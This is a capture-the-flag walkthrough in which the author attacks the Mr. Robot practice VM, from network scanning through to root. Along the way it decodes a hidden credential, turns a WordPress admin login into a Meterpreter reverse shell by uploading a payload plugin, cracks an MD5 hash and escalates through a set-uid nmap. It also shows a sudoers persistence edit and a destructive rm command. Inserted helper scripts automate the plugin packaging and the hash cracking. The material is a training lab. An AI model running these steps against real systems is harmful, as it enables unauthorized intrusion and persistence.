
CTF – Hacking Mr. Robot by EM

Another learning exercise to improve my penetration testing skills: hacking the Mr. Robot virtual machine as my target.
My private network for this penetration testing exercise:
  • Kali Linux, my attack machine. IP Address
  • Mr.Robot, my target machine. IP Address: Unknown
Let's begin. My objective is to find the three hidden keys.
I don't know the target machine's (Mr. Robot) IP address, so I start by sweeping my private network with nmap. Any network discovery tool will do; I prefer nmap because it is already on my pentest machine. Note that -T4 only speeds up the timing; without -p, nmap scans its default top 1000 TCP ports.
root@kali:~# nmap -T4
Starting Nmap 7.31 ( ) at 2016-11-30 10:41 EST
Nmap scan report for
Host is up (0.00037s latency).
Not shown: 997 filtered ports
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:F8:73:37 (VMware)
Nmap scan report for
Host is up (0.00015s latency).
All 1000 scanned ports on are filtered
MAC Address: 00:50:56:F4:2B:CA (VMware)
Nmap scan report for
Host is up (0.0000050s latency).
All 1000 scanned ports on are closed
Nmap done: 256 IP addresses (3 hosts up) scanned in 39.00 seconds
That found my target's IP address (the VMware guest with 80 and 443 open) and its open ports: basic enumeration of my private network. Port 22 reports closed, so there is no SSH to try credentials against later; the web server is the way in.
Ports 80 and 443 are the interesting ones to start poking at. I launch Firefox from the command line; you can just as well click the Firefox icon and enter the web server's IP address. It's cool to use the CLI.
root@kali:~/KING.NET/mr.robot# firefox
The website loads a JavaScript animation that looks like a Linux terminal booting.
The page source contains the comment "You are not alone".
I check whether any of this helps me attack the Mr. Robot box.
Nothing so far; I will come back to this page later.
Let's try dirb (a directory brute-forcer; the command is dirb, not dirbuster) to learn what the site serves:
root@kali:~/KING.NET/mr.robot# dirb
DIRB v2.22
By The Dark Raver
START_TIME: Wed Nov 30 19:18:31 2016
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
---- Scanning URL: ----
+ (CODE:301|SIZE:0)
+ (CODE:302|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:1077)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:516314)
==> DIRECTORY: (CODE:200|SIZE:309) (CODE:302|SIZE:0)
+ (CODE:301|SIZE:0)
+ (CODE:403|SIZE:94)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:64) (CODE:200|SIZE:41) (CODE:200|SIZE:41)
+ (CODE:301|SIZE:0)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:0) (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:227)
+ (CODE:200|SIZE:0) (CODE:200|SIZE:2627)
--- snip --- dirb still running.
I cancel it; there is enough here to start digging. The results reveal sub-folders such as /admin, /blog, /license, /phyadmin, /wp-admin, /wp-login, /wp-config, etc. Reading the codes: a 301 usually marks a directory, a 403 a path that exists but is forbidden, and a 200 with a non-zero size a page worth opening. The wp-* paths tell me the Mr. Robot site runs the WordPress content management system. Nice.
Checking one of the sub-folders:
root@kali:~/KING.NET/mr.robot# firefox
A web page with this content: "what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?"
Scrolling to the end of the page shows the text "do you want a password or something?" followed by a string that looks like base64.
I paste it into nano, save it as 1stdump.txt and decode it with base64 -d (the -i flag tells base64 to ignore non-alphabet characters such as stray whitespace):
root@kali:~/KING.NET/mr.robot# nano 1stdump.txt
root@kali:~/KING.NET/mr.robot# base64 -d -i 1stdump.txt
It decodes to elliot:ER28-0652, which looks like a username and password. Let's try logging in to the Mr. Robot virtual machine with this pair.
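As an added example (not part of the original post), here is a small shell helper that automates the step above: it scans a saved page body for base64-looking tokens and prints those that decode to printable text, so a hidden credential blob stands out without eyeballing the source. The sample page text is constructed for the example; the blob in it is the one decoded above.

```shell
#!/bin/sh
# Added example, not the post's own commands: find base64-looking tokens in a
# saved page body and show the ones that decode to readable text.

# Print every base64-looking run of 16+ characters in the file given as $1.
b64_candidates() {
    grep -oE '[A-Za-z0-9+/]{16,}={0,2}' "$1"
}

# Decode $1; succeed only if the result is printable text (no binary garbage).
decode_if_printable() {
    decoded=$(printf '%s' "$1" | base64 -d 2>/dev/null) || return 1
    [ -n "$decoded" ] || return 1
    # tr deletes every printable byte; anything left over means binary output.
    [ -z "$(printf '%s' "$decoded" | tr -d '[:print:]\n\t')" ] || return 1
    printf '%s\n' "$decoded"
}

# Walk the candidates in a file and emit "token -> decoded" for each clean decode.
find_hidden_strings() {
    b64_candidates "$1" | while IFS= read -r tok; do
        dec=$(decode_if_printable "$tok") || continue
        printf '%s -> %s\n' "$tok" "$dec"
    done
}

# Constructed sample page text standing in for the page fetched from the target.
sample_page=$(mktemp)
cat > "$sample_page" <<'EOF'
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
do you want a password or something?
ZWxsaW90OkVSMjgtMDY1Mg==
EOF

find_hidden_strings "$sample_page"
```

Run it against a page saved with curl or wget; tokens whose length is not a multiple of four or that decode to binary are skipped, which keeps ordinary long words out of the output.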
No luck! Keep hacking the box :(.
Trying the same pair on the WordPress login page instead: success!
Checking Users, elliot is also an Administrator. Jackpot! There is another user, micho05654, with the Subscriber role; I'll ignore it and focus on elliot the administrator.
Now I can control this box from here. With WordPress administrator rights I can turn the CMS into a reverse shell, and Kali does most of the work. Click Applications, Exploitation Tools, then MSF Payload; this opens the MSFVenom Payload Creator (msfpc) in a new terminal window. I run the command below.
root@kali:~# msfpc php 443 msf reverse stageless tcp
The arguments mean: php is the payload type; the attacker IP (msfpc fills in the address of the chosen interface) and port 443 are where the target connects back; msf selects a Meterpreter payload so I get the full power of Metasploit; reverse makes the target connect back to the attacker; stageless builds a complete stand-alone payload instead of a small stager that fetches the rest; tcp is the plain transport. Run msfpc --help for more details.
root@kali:~# msfpc php 443 msf reverse stageless tcp
[*] Msfvenom Payload Creator (MPC v1.4.3)
[i] IP:
[i] PORT: 443
[i] TYPE: php (php/meterpreter_reverse_tcp)
[i] CMD: msfvenom -p php/meterpreter_reverse_tcp -f raw \
--platform php -e generic/none -a php LHOST= LPORT=443 \
> '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] php meterpreter created: '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] MSF handler file: '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[i] Run: msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080
[*] Done!
After running the MSFVenom Payload Creator, the program generated two files:
  1. php-meterpreter-stageless-reverse-tcp-443.php
  2. php-meterpreter-stageless-reverse-tcp-443-php.rc
It also prints the command to start the handler: msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'. All ready for me to execute.
root@kali:~# msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
My listener (the attacker machine) is ready and waiting for a connection.
resource (/root/php-meterpreter-stageless-reverse-tcp-443-php.rc)> run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on
[*] Starting the payload handler...
msf exploit(handler) >
The MSFVenom Payload Creator also suggests a quick web server for file transfer (python -m SimpleHTTPServer 8080). I won't use it in this scenario: I already have administrator access to the WordPress site, so I can deliver the payload by installing it as a WordPress plugin. At this point I could wreak havoc on the WordPress installation by deleting content, but the goal is to own the box (pwn to root, or pwn 2 r00t).
I edit the PHP file so WordPress recognises it as a plugin. WordPress reads the plugin metadata from a comment block at the top of the file (only Plugin Name: is required), so the file must start with the PHP opening tag and the header must sit inside /* ... */. Here's the updated PHP file:
<?php
/*
Plugin Name: Pwn-to-Root
Plugin URI:
Description: A demo using WordPress to establish a reverse shell.
Author: EM @ KING.NET
Version: v1.0
Author URI:
*/
//<?php if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); } if (!isset$
The payload's own <?php tag is commented out because the file is already in PHP mode; make sure only the tag, not the payload code after it, ends up inside that comment, otherwise the plugin activates but nothing connects back.
Then zip the PHP file (zip takes the archive name first, then the files to add):
root@kali:~# zip php-meterpreter-stageless-reverse-tcp-443.php
adding: php-meterpreter-stageless-reverse-tcp-443.php (deflated 76%)
The payload is now ready to upload through the WordPress management console. Back on the WordPress admin page: Plugins, Add New, Upload Plugin; browse to the zip file, click Install Now and wait for the upload to complete.
The handler is already listening (above), so all I have to do is click Activate Plugin, which runs the plugin's PHP and makes the connect-back. Checking the listener, I see our session:
[*] Meterpreter session 1 opened ( -> at 2016-12-03 23:39:58 -0500
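The packaging steps above, as an added shell example rather than the post's own commands: make_plugin wraps a payload file in the header comment WordPress needs (dropping a bare leading <?php tag, since the file is already in PHP mode; msfvenom's /*<?php /**/ first line is already a valid comment there and is left alone), and package_plugin builds the zip with the archive name first. The stand-in payload is a constructed one-liner, not a real Meterpreter payload; the plugin name and directory layout are my choices.

```shell
#!/bin/sh
# Added example, not from the post: turn a PHP payload into a WordPress plugin zip.

# make_plugin PAYLOAD.php "Plugin Name" OUTDIR -> prints the path of the plugin .php
make_plugin() {
    payload=$1; name=$2; outdir=$3
    slug=$(printf '%s' "$name" | tr 'A-Z ' 'a-z-')
    mkdir -p "$outdir/$slug"
    out="$outdir/$slug/$slug.php"
    {
        # WordPress only needs "Plugin Name:" inside the leading comment block.
        printf '<?php\n/*\nPlugin Name: %s\nDescription: Reverse shell demo plugin.\nVersion: 1.0\n*/\n' "$name"
        # The file is already in PHP mode, so a bare "<?php" at the top of the
        # payload would be a parse error: strip it. A "/*<?php /**/" first line
        # (msfvenom's form) is a valid comment in PHP mode and passes through.
        sed '1s/^<?php//' "$payload"
    } > "$out"
    printf '%s\n' "$out"
}

# package_plugin PLUGINDIR -> builds PLUGINDIR.zip with the directory as top level.
# The archive name is the FIRST argument to zip; the files to add follow.
package_plugin() {
    dir=$1
    ( cd "$(dirname "$dir")" && zip -qr "$(basename "$dir").zip" "$(basename "$dir")" ) || return 1
    printf '%s.zip\n' "$dir"
}

# Constructed stand-in payload; real msfvenom output is several KB of PHP.
work=$(mktemp -d)
printf '<?php\necho "payload runs as " . get_current_user() . "\\n";\n' > "$work/payload.php"

plugin=$(make_plugin "$work/payload.php" "Pwn to Root" "$work")
head -n 6 "$plugin"
if command -v zip >/dev/null 2>&1; then
    package_plugin "$(dirname "$plugin")"
fi
```

Upload the resulting zip through Plugins, Add New, Upload Plugin; the code runs when the plugin is activated (in fact on every page load once active, so deactivate it when done).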
Back at the handler prompt, sessions lists the active sessions:
msf exploit(handler) > sessions
Active sessions
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/linux daemon (1) @ linux -> (
msf exploit(handler) >
help sessions shows the options for working with sessions:
msf exploit(handler) > help sessions
Usage: sessions [options]
Active session manipulation and interaction.
-K Terminate all sessions
-c <opt> Run a command on the session given with -i, or all
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s <opt> Run a script on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
I attach to session 1 with -i (interact with the supplied session ID):
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
We are now in the session. From here I can run commands on the Mr. Robot machine, e.g. ls and pwd:
meterpreter > ls
---snip ---
100644/rw-r--r-- 19642 fil 2015-09-16 06:49:06 -0400 user-new.php
100644/rw-r--r-- 16552 fil 2015-09-16 06:49:06 -0400 users.php
100644/rw-r--r-- 16143 fil 2015-09-16 06:49:06 -0400 widgets.php
meterpreter > pwd
meterpreter >
Let me check the home directory:
meterpreter > ls /home
Listing: /home
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
There is a robot directory; continue digging ...
meterpreter > ls
Listing: /home
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
meterpreter > cd robot
meterpreter > ls
Listing: /home/robot
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100400/r-------- 33 fil 2015-11-13 02:28:21 -0500 key-2-of-3.txt
100644/rw-r--r-- 39 fil 2015-11-13 02:28:21 -0500 password.raw-md5
meterpreter >
In /home/robot there are two files:
  1. key-2-of-3.txt
  2. password.raw-md5
I can't read key-2-of-3.txt: its mode is r-------- (readable only by its owner, user robot), and the Meterpreter session runs as the web server's account, not robot, so the open fails (error below). password.raw-md5 is world-readable (rw-r--r--):
meterpreter > cat key-2-of-3.txt
[-] core_channel_open: Operation failed: 1
meterpreter > cat password.raw-md5
meterpreter >
The content, robot:c3fcd3d76192e4007dfb496cca67e13b, is username:password-hash. MD5 is a one-way hash, so it cannot be "decrypted"; an online MD5 lookup site matched the digest against its precomputed table, and c3fcd3d76192e4007dfb496cca67e13b turned out to be the MD5 of abcdefghijklmnopqrstuvwxyz. Wow, the password is that basic; a wordlist cracker such as john or hashcat would have recovered it in seconds. Anyway, let me log in to the Mr. Robot box as robot with the password abcdefghijklmnopqrstuvwxyz (port 22 is closed, so this has to happen from the shell I already have on the box rather than over SSH).
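As an added example (not from the post), here is the same recovery done offline with a wordlist, the way john or hashcat do it: hash each candidate and compare it with the digest from password.raw-md5. The hash file is constructed from the line found above, and the mini wordlist stands in for a real dictionary.

```shell
#!/bin/sh
# Added example, not the post's own commands: dictionary attack on a "user:md5" file.

# md5_of STRING -> hex digest of STRING (no trailing newline), GNU md5sum or BSD md5.
md5_of() {
    if command -v md5sum >/dev/null 2>&1; then
        printf '%s' "$1" | md5sum | cut -d' ' -f1
    else
        printf '%s' "$1" | md5 -q
    fi
}

# crack_md5 HASHFILE WORDLIST -> prints "user:password" for the first hit, returns 1 if none.
# HASHFILE holds lines of the form user:hexdigest (the password.raw-md5 format).
crack_md5() {
    hashfile=$1; wordlist=$2
    while IFS=: read -r user digest; do
        digest=$(printf '%s' "$digest" | tr 'A-F' 'a-f')
        # "|| [ -n ... ]" also handles a last line with no trailing newline.
        while IFS= read -r word || [ -n "$word" ]; do
            if [ "$(md5_of "$word")" = "$digest" ]; then
                printf '%s:%s\n' "$user" "$word"
                return 0
            fi
        done < "$wordlist"
    done < "$hashfile"
    return 1
}

work=$(mktemp -d)
# Constructed hash file; the digest is the one found in /home/robot above.
printf 'robot:c3fcd3d76192e4007dfb496cca67e13b\n' > "$work/password.raw-md5"
# Constructed mini wordlist standing in for a real dictionary such as fsocity.dic.
printf 'password\nmrrobot\nelliot\nabcdefghijklmnopqrstuvwxyz\nfsociety\n' > "$work/words.txt"

crack_md5 "$work/password.raw-md5" "$work/words.txt"
```

With a real wordlist, deduplicate it first (sort -u); fsocity.dic in particular repeats most of its entries. A shell loop is fine for a few thousand words; for anything larger use john --format=raw-md5 or hashcat -m 0, which hash millions of candidates per second.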
Logged in as robot with abcdefghijklmnopqrstuvwxyz. Run ls to list the directory.
Run cat key-2-of-3.txt to view the file.
Check whether I can ls /root.
Oops ... getting root will take more research.
After long hours of research and reading other penetration testing sites and blogs ...
I checked the nmap version on the Mr. Robot box. Old nmap releases (before 5.x) have an --interactive mode, and inside it a command prefixed with ! is run through a shell.
I try nmap --interactive with !bash to run a shell command.
No luck.
Now trying !sh to run a shell command. Type "exit" to leave that shell and return to the nmap prompt.
!sh works, and the shell is root: this nmap binary is installed set-uid root, so the shell it spawns keeps root privileges (the tell is the s in the owner's execute position of ls -l $(which nmap)). Checking /root: /root/firstboot_done is empty, and /root/key-3-of-3.txt gives our key, 04787ddef27c3dee1ee161b21670b4e4.
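An added example (not from the post) of the check behind this privilege escalation: enumerating set-uid binaries. The directory argument lets the same function run against a constructed scratch tree here and against / on a target; the fake nmap script is constructed for the example.

```shell
#!/bin/sh
# Added example, not the post's own commands: list set-uid files, the usual first
# check for a local privilege escalation path such as an old set-uid nmap.

# find_suid DIR -> "owner path" for every regular file under DIR with the set-uid bit.
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        owner=$(ls -ld "$f" | awk '{print $3}')
        printf '%s %s\n' "$owner" "$f"
    done
}

# is_suid FILE -> 0 if FILE carries the set-uid bit, 1 otherwise (POSIX test -u).
is_suid() {
    [ -u "$1" ]
}

# Constructed scratch tree: one set-uid file, one normal file.
scratch=$(mktemp -d)
mkdir -p "$scratch/usr/bin"
printf '#!/bin/sh\necho fake nmap\n' > "$scratch/usr/bin/nmap"
printf '#!/bin/sh\necho harmless\n' > "$scratch/usr/bin/harmless"
chmod 4755 "$scratch/usr/bin/nmap"
chmod 0755 "$scratch/usr/bin/harmless"

find_suid "$scratch"
```

On a target, find_suid / | grep '^root ' gives the candidates; anything that is not normally set-uid (nmap, editors, interpreters, custom binaries) deserves a look, and old nmap specifically because --interactive hands out a shell under the binary's privileges.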
At this point I have two of the three keys:
  1. key-1-of-3.txt - ?
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".
What's next after getting root access? I'm not done yet: my user robot is still a standard account. I can escalate robot to root permanently by adding "robot ALL=(ALL) ALL" to the sudoers file. From the root shell, type nano /etc/sudoers and add that line. (visudo is the safer way: it locks the file and refuses to save a syntax error, and a broken /etc/sudoers locks everyone out of sudo.)
Save it, exit the !sh shell, quit nmap, run sudo ls and enter robot's password. If everything goes well, sudo su gives me a root shell.
From here I can do anything to the Mr. Robot virtual machine. I could even destroy the box with a command like "# rm -r --no-preserve-root" (don't).
I still need the value of key-1-of-3.txt. Going back to the website, I check the other sub-folders.
The first page I check has nothing.
robots.txt, however, lists two interesting entries: fsocity.dic and key-1-of-3.txt. Let's download these files and investigate.
root@kali:~/KING.NET/mr.robot# firefox
User-agent: *
Then wget the dictionary:
root@kali:~/KING.NET/mr.robot# wget
--2016-12-03 15:13:04--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[=======================>] 6.91M 20.0MB/s in 0.3s
2016-12-03 15:13:06 (20.0 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]
fsocity.dic is 6.9 MB; it is probably a word list.
Let me download the text file too:
root@kali:~/KING.NET/mr.robot# wget
--2016-12-03 15:14:47--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 33 [text/plain]
Saving to: ‘key-1-of-3.txt’
key-1-of-3.txt 100%[=======================>] 33 --.-KB/s in 0s
2016-12-03 15:14:47 (4.97 MB/s) - ‘key-1-of-3.txt’ saved [33/33]
key-1-of-3.txt is only 33 bytes: a 32-character hex string plus a newline.
I run cat fsocity.dic to check the content and confirm it is a dictionary file. cat key-1-of-3.txt gives the following result:
root@kali:~/KING.NET/mr.robot# cat key-1-of-3.txt
Found it: key-1-of-3.txt is "073403c8a58a1f80d943455fb30724b9".
So all three keys are discovered!
  1. key-1-of-3.txt "073403c8a58a1f80d943455fb30724b9"
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".

That was fun ...
Thank you for reading my walkthrough. I will post a follow-up video later this week.
And I'm still catching up on the other challenges the site provides.
Thank you,